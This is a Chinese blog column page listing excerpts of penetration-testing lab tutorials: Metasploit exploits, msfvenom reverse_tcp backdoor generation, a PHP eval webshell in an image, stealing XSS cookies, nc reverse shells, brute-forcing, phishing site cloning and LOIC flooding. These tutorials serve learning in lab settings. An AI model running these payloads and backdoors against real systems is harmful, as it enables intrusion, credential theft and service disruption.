web渗透
文章平均质量分 79
渗透测试的工具使用实验整理
Deeeelete
这个作者很懒,什么都没留下…
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
XSS提取cookie到远程服务器
攻击机: 192.168.132.144(kali)受害机: 192.168.132.188(DVWA)1.low级别然后找反射型xss的界面且已知反射型xss输入对应的js代码<script>alert(1)</script>会弹窗。以及使用<script>alert(document.cookie)</script>会弹cookie2.则回kali下写php脚本用来接收,首先确保kali已经开启了apache服务,如果没有则开启的命.原创 2020-08-13 19:03:05 · 4400 阅读 · 0 评论 -
利用msf进行ms12-020蓝屏攻击
攻击机(kali):192.168.132.144受害机(winserver2003):192.168.132.1341.在【我的电脑】->右键选中【管理】,找到系统工具下的【本地用户和组】下的【用户】,在空白处右键添加【新用户】2.返回桌面,右键我的电脑的属性。选择远程选择远程用户添加输入我们之前添加的用户,确定3.回到kali中,查看是否存在此漏洞可以用msf也可以用nmap扫,这里我演示后者。nmap --script=vuln 192.168.132.134.原创 2020-07-13 16:19:27 · 1655 阅读 · 1 评论 -
wireshark抓取telnet密码
受害机:192.168.132.128(win7)抓取Telnet密码win7环境首先确定自己是否有隶属于管理员组的用户如果没有对应用户,可以去开始 => 控制面板 => 添加和删除用户下添加然后可以先在本地测试,打开cmd输入telnet localhost在y过后如果提示失去连接,则说明用户没有被添加到telnet的用户组进一步操作,去开始菜单=>运行中输入lusrmgr.msc:点击组找到Telnet相关双击打开然后配置xshell连接连接成功会显示直接进入c盘原创 2020-07-07 19:30:14 · 4054 阅读 · 2 评论 -
kali下利用ettercap进行内网dns劫持
kali(攻击机):192.168.132.144centos8(受害机):192.168.132.109kali下使用vim /etc/ettercap/etter.dns修改对应的配置文件,添加对应的劫持地址,*代表劫持地址,如果是想要拦截具体的地址可以用具体的url代替 开启kali下的apache服务,确保直接访问kali的ip会存在一个可视的页面,等到最终劫持对方的dns之后会直接把地址转发到我们kali下的网址上。保存退出后找到kali下的ettercap,单击打开点击Sniff开.原创 2020-06-28 20:14:03 · 2753 阅读 · 4 评论 -
kali下利用xhydra进行ssh爆破
使用xhydra命令启动xhydra界面在弹出的设置界面中填写需要爆破的ip地址,选择对应的协议,下方显示细节部分可以不勾选。3.在password一栏可以配置字典,这里的字典是我从本地上传的。线程可以选择默认直接到最后一栏,可以点击start开始爆破当然这里爆破的时间比较漫长,我直接针对自己的ip进行了一次尝试后,正确匹配到的用户名密码会被加粗显示出来。...原创 2020-06-23 22:02:50 · 1269 阅读 · 0 评论 -
kali下nc通信,文件传输,反弹shell
kali1: 192.168.132.133kali2: 192.168.132.144一:使用nc通信在kali1中使用nc -lnvp [端口号]来监听一个端口在kali2中使用nc [kali1的ip] [端口]来链接对方监听的端口然后可以在kali1中查看到链接机器然后可以在kali2中直接输入内容然后回车,与此同时即可在kali1中接收到kali2的信息二:使用nc传输文件kali2向kali1传输一个img2.jpg文件确保kali2下..原创 2020-06-21 16:38:49 · 3679 阅读 · 0 评论 -
msf制作Linux恶意软件获取shell
1.生成linux可执行文件msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.132.144 LPORT=4444 -b "\x00" -i 10 -f elf -o /var/www/html/clownclown2.配置监听3.拖进系统4.赋予权限5.运行...原创 2020-02-26 19:15:48 · 860 阅读 · 0 评论 -
msf制作恶意deb软件包来触发后门
攻击机:192.168.132.144(kali1)手害机:192.168.132.133(kali2)本该是由攻击机生成恶意deb包,然后把包发给受害机让它访问然后监听的,但因为中间有一个包传递的过程,我就直接省略这一步直接在受害机里生成了,但监听地址是填写的攻击机。1.第一步我们先下载所需的freesweep软件包(这里使用的是kali2) apt --download-only in...原创 2020-02-25 21:35:04 · 1157 阅读 · 0 评论 -
msf利用jre-7u17-windows-i586漏洞获取shell
首先要在win7安装java环境,版本是jre-7u17-windows-i586百度云链接:https://pan.baidu.com/s/1UOuBZcCKbBcrJM7qzIw_nQ提取码:ociq 安装期间先去msf开启模块use exploit/multi/browser/java_jre17_driver_manager set payload java/meterpret...原创 2020-02-24 11:11:57 · 1172 阅读 · 0 评论 -
msf利用0DAY漏洞获取shell
安装CVE-2018-8174_EXP git clone https://github.com/iBearcat/CVE-2018-8174_EXP .git 然后发现没克隆下来,所以这里我直接用xshell上传了zip包并解压在本目录进入我们的文件目录cd CVE-2018-8174_EXP-master/生成恶意html文件python CVE-2018-8174.py -...原创 2020-02-23 13:39:20 · 829 阅读 · 0 评论 -
msf利用ftp协议进行信息搜集
1.使用ftp_version查看信息搜索模块msf5 > search ftp_version使用模块,查看信息msf5 > use auxiliary/scanner/ftp/ftp_versionmsf5 auxiliary(scanner/ftp/ftp_version) > show optionsmsf5 auxiliary(scanner/ftp/f...原创 2020-02-22 11:39:12 · 884 阅读 · 0 评论 -
msf08_067利用
漏洞针对于老xp和2003快捷步骤:msfconsoleuse exploit/windows/smb/ms08_067_netapiset RHOSTS 1.1.1.1set target 34runshell 1. 打开控制台,`use exploit/windows/smb/ms08_067_netapi` 使用模块 2. `set RHOSTS 1.1.1.1`设置x...原创 2020-02-20 15:28:09 · 422 阅读 · 0 评论 -
msf扫描靶机mysql空密码
完整步骤:msf5 > use auxiliary/scanner/mysql/mysql_loginmsf5 auxiliary(scanner/mysql/mysql_login) > show optionsModule options (auxiliary/scanner/mysql/mysql_login): Name Current...原创 2020-02-19 13:14:06 · 763 阅读 · 0 评论 -
Metasploit入门基础知识总结
基本信息:以前用 Metasploit的时候都是无脑的照着操作,虽然只要操作无误就可以实现效果,但这种方式也只是知其果,不知其因果,这样做不系统,也不全面,所以通过学习就把 Metasploit的基础知识又整理了一下。Metasploit 渗透测试框架有着核心的三个库:Rex、framework-core 、framework-base。这些库对框架本身提供了最基础最底层的一些环境依赖,...原创 2020-02-18 14:19:37 · 892 阅读 · 0 评论 -
使用recon-neg进行简单信息搜集演示
软件在kali的应用程序列表中,选择信息搜集模块就可以找到。然后进入软件窗口界面使用help可以查看帮助菜单使用show modules可以查看存在的模块操作步骤:我们先通过以下模块进行演示 use recon/domains-hosts/brute_hosts此时可以使用show options查看本模块参数我们看到本此模块总共两个参数,SOURCE和WORDLIST,其中通过描述...原创 2020-02-15 10:00:13 · 234 阅读 · 0 评论 -
kali下安装cupp以及cupp字典生成
cupp是一款用python编写的社工字典生成工具,使用者可以通过了解某一个人员的姓名,年龄,家庭情况等因素,并通过该工具生成一个仅针对于该社会成员个体的密码字典。简单来说,就是有些人喜欢用姓名的拼音,自己的或者家庭成员的姓名拼音,生日,邮箱,社交软件的账号等等混搭起来组成密码,而cupp就是将众多姓名拼音、生日等信息整合起来之后尽可能多的进行组合,通过广撒网的方式试图去无限接近用户的真实密码。...原创 2020-02-11 18:23:27 · 2191 阅读 · 0 评论 -
nmap简易扫描演示
Nmap,也就是Network Mapper,是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 fingerprinting)。它是网络管理员必用的软件之一,以及用以评估网络系统安全。  ...原创 2020-02-10 20:55:25 · 1111 阅读 · 0 评论 -
利用Beef进行XSS会话劫持
1.登入靶机中的DVWA环境,安全等级调到最低,进入xss环境界面2.打开自带的beef软件第一次使用会提示你修改密码vim /etc/beef-xss/config.yaml打开修改,将密码修改成其他任意的内容就可以重新打开软件了。保存退出然后重新打开软件就可以正常进入了登录密码就是我们刚才修改的,输入然后登录3.回到终端,因为beef打开会默认开一个终端和一个浏览器界面,我们找到beff为我们...原创 2020-02-09 20:46:48 · 1734 阅读 · 1 评论 -
简单图片木马的生成与利用
首先准备一个图片,还有一个脚本,这里的php文件就采用了最简单的一句话木马,具体内容为<?php @eval($_POST['a']);?>,确保两个文件在同一个路径下。2.紧着着按住shift键,然后点击鼠标右键,这时候就会出现“在此处打开powershell”的字眼,点击 进入蓝色窗口,其实我们想通过这样来进入cmd,所以我们用命令start cmd;进入3.在cmd中输入 c...原创 2020-02-08 13:06:29 · 13826 阅读 · 7 评论 -
msf批量扫描ssh弱口令登录
msfconsolesearch ssh_login搜索模块`use auxiliary/scanner/ssh/ssh_login使用第一个模块配置信息(分别设置密码,用户名,扫描的ip段):`msf5 > use auxiliary/scanner/ssh/ssh_loginmsf5 auxiliary(scanner/ssh/ssh_login) > set pas...原创 2020-02-05 19:12:47 · 2798 阅读 · 1 评论 -
msf生成windows后门程序
进入文件夹,我们先要把我们需要制作后门程序的正常exe文件拖进去在此处打开终端,确保该路径存在这个exe文件!输入命令msfvenom -a x86 --platform widows -p windows/meterpreter/reverse_tcp LHOST=192.168.132.133 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i ...原创 2020-02-04 16:12:53 · 3044 阅读 · 0 评论 -
LOIC网站压力测试工具
官网下载:https://sourceforge.net/projects/loic/百度云:https://pan.baidu.com/s/1VVUjLqtq1mMAD-TJIAnhnQ1.软件解压后运行,界面如图2.然后可以在url处输入想要测试的网站网址,也可以输入ip地址,输入完之后要点击右侧的lock on,输入的网站地址会自动填充到selected target中。3.下...原创 2020-02-02 10:00:02 · 30021 阅读 · 10 评论 -
Acunetix简单扫描测试
软件的安装下载以及功能介绍参考脚本之家:https://www.jb51.net/softs/659643.html1.单击图标打开网站,会提示输入账户密码,账户密码在注册的时候已经是填写好了的成功后进入以下界面2.默认就已经进入了Targets界面,点击上方的add Targets3.接下来要求我们填写需要扫描的网站地址,这里用靶机测试完成后点击Add Target4.下方的扫描配...原创 2020-02-01 10:07:37 · 2103 阅读 · 1 评论 -
skipfish简单扫描测试
同样是kali系统自带,启动命令为skipfishskipfish -o txt http://1.1.1.1/dvwa-o大概就是output输出,后面跟的txt是输出路径,txt就是/root/txt文件夹的意思,最后面填写你要扫描的网址回车后出现以下提示,继续回车就行当然如果真的等它全部扫描完的话会很漫长,这里就提前停止了,得到保存的文件地址接着我们打开自带的火狐浏览器,默认打...原创 2020-01-30 11:14:18 · 612 阅读 · 1 评论 -
nikto扫描测试
工具kali自带,但因为现在nikto之后的更新已经转移到github去了,国内kali中的nikto -update已经获取不到最新的版本,如需最新版本可以下方自取,这里就用自带的工具进行演示了。nikto github下载:https://github.com/sullo/niktonikto 官网下载页:https://cirt.net/Nikto2nikto历史版本:https:...原创 2020-01-29 11:54:06 · 1107 阅读 · 0 评论 -
DirBuster使用教程
工具是kali自带,多用于网站的后台扫描工具路径:/usr/share/dirbustercd /usr/share/dirbuster进入路径后ls查看,会看到目录下的jar文件:2. java -jar DirBuster-1.0-RC1.jar 打开jar文件3. 出现可视化窗口,配置很多,现在我们先填写空白的输入框部分,这里我们在第一个输入框填写扫描网站的url地址4....原创 2020-01-28 11:29:54 · 13758 阅读 · 1 评论 -
sqllab第一关新手向解析
1来到URL以PHP文件为结尾的界面,直接在文件后斜线构造?id=1’来判断,并通过报错的相关内容来分析,已知我们报错的内容为”1”LIMIT 0,1’,我们输入的内容是1’,所以后面的内容是’LIMIT 0,1’2这里我们判断它的字段数,使用order by n(数字) 来猜测,在猜测到字段4的时候报错,说明其中会有三个字段,语句中的%23是注释,用来消除后面不需要的语句,常有的注释有# %2...原创 2019-09-25 09:11:09 · 1122 阅读 · 0 评论 -
tomcat漏洞利用
目前并没有在windows上测试1.搜寻kali中的cmd.war文件,路径最长的就是我们需要的find / -name "cmd.war"2.将文件复制到根目录下cp /usr/share/clusterd/src/lib/resources/cmd.war /cmd.war3.tomcat默认是8080,也可以提前用nmap扫描端口确认一下namp -sV ip地址...原创 2019-11-06 13:19:19 · 1113 阅读 · 1 评论 -
httrack镜像网站(kali版与win版)
kali镜像文件:https://pan.baidu.com/s/1U-NpeYc7EUDtDJQjVs6Mngkali版使用(kali自带)终端中输入httrack回车接下来是要求输入一个项目名称,自己填一个即可保存的项目路径,这里选择根目录下的project文件夹输入需要镜像的网站的url地址,这里直接将网站地址复制进去第一次镜像的话这里先选择一个带有引导提示的模式来镜像网...原创 2020-01-22 18:27:20 · 4013 阅读 · 0 评论 -
setoolkit简易社会工程学攻击
工具kali自带,终端中输入setoolkit回车,如果是第一次打开的话会给提示,输入y回车同意使用1.setoolkit2.进入软件界面,上方的logo部分这里我就不去截图了,直接看最下方的菜单界面,这里我们选择第一个 social engineering attacks社会工程攻击3.回车后进入下一个界面,一大串洋文,这里选择第二个,Website Attack Vectors(网...原创 2020-01-23 18:51:46 · 2775 阅读 · 3 评论 -
个人渗透测试集成环境
基于centos7搭建,目前并没有在其他pc上做更详细的测试百度云链接:链接:https://pan.baidu.com/s/1Yq4WCmERbOiHnSJNluYCJQ提取码:u2dk虚拟机界面详情:预装环境:1.DVWA 用户名:admin 密码:password2.xss闯关3.upload labs(文件上传)4.Sqllabs(sql注入练习)...原创 2020-01-22 11:53:29 · 536 阅读 · 0 评论 -
sqllab第五关解析
查看注入 “1”说明刚好闭合,我们查看字段试试成功报错了,但是有一个额外情况,那就是当我们查看字段3的时候它是这么一个情况,注意这里用的是1而不再是-1了,因为它压根儿就没返回任何username和password,只有个句子。这说明我们遇到了无比令人厌烦的布尔注入2.屏幕不提示内容,我们知道的只有一个信息,那就是,当我们构造的语句正确的时候,它必然返回you are in,所以...原创 2019-12-09 16:13:16 · 1148 阅读 · 2 评论 -
sqllab第四关解析
按照以往经验,它们估计永远在第四个字段上报错,所以直接查字段,而且它们也必定报错什么也没有,说明后面的语句没读取,用-1’”试试后面出现了),所以我们知道要加),但后方也出现了”,而且奇怪的是我们之前写在order by 前面的”没了,那肯定是跟前面的某个”给闭合了,为了进一步确定,再查看一下。它提示前面已经有了一个”,所以我们的确闭合了它,因此保留这里的”并加)然后就是以...原创 2019-12-09 15:51:15 · 513 阅读 · 0 评论 -
sqllab第三关解析
直接查看字段成功报错,为了看的清楚一点,用id=-1’查看报错的内容是”-1”)等等,这里出现了一个),而且从图中看出,-1被两队引号包围,形成了一个完整的闭合,说明加单引号无误,错误出在),那意思是我们需要闭合),那是用(闭合吗?并不是,在未注入之前的数据库语言应该是完整而正确的,这就是说语言中不可能只有一个)孤零零出现,前面依然有一个(了,但这个它不爆出所以不显示,我们要继续用)将...原创 2019-12-09 15:47:18 · 574 阅读 · 0 评论 -
sqllab第二关解析
根据上一关所学,第二关直接开始字段判断. 然后我们非常顺利的得到了一个报错,报错的整体内容是”order by 4 LIMIT 0,1’ 忽略我们输入的-1,单引号后面的内容是 ‘order by 4 LIMIT 0,1’,整句话都在引号内,这就是一个完整的闭合,但注意的是,整句话的全貌是”order by 4 LIMIT 0,1’,前面有两个单引号,这说明我们输入的一个单引号其...原创 2019-12-09 15:42:47 · 700 阅读 · 0 评论 -
基于burpsuite的简单sqlmap练习
上次已经讲过了sqlmap的基本实用方法,知道在取得cookie的情况下sqlmap如何进行一次有效的注入,那么接下来额外补充一下另一种sqlmap的注入方法。环境还是用熟悉的dvwa,仍然是找到sql注入的应用界面,但这次需要用到同样是之前提到过的抓包工具burpsuite以及代理插件。1.记得把安全等级调低,这里只是做一个巨简单巨简单的实验,套路跟平常的sqlmap是差不多的,同样是...原创 2019-11-29 20:31:59 · 303 阅读 · 1 评论 -
利用burpsuite做简易的文件上传实验,内含软件、插件安装教程
软件运行需要提供java环境,没有的话可以自己搜索jdk安装整体流程:1:burpsuite软件安装2:FoxyProxy Standard插件安装3:phpstudy集成环境安装4:练习总结:安装半小时,做题两分钟1:burpsuite安装这里使用upload_labs环境进行演示,该环境用于文件上传漏洞的练习,百度云提取码:1etp ,大小为650kburpsuite可以...原创 2019-11-27 18:10:05 · 7275 阅读 · 1 评论 -
sqlmap入门级使用技巧
这里主要是利用dvwa环境进行工具演示1:首选是找到sql注入的界面,也就是SQL injection界面,然后在输入框中输入任意数字,这里以1作为演示,作为一个get传入数值,url中已经显示了我们传入的变量2:接下来是获取页面的cookie数值,打开开发者工具,按f12开启,找到控制台console,输入document.cookie回车"security=low; PHPSESSID=...原创 2019-11-27 15:53:13 · 348 阅读 · 0 评论
分享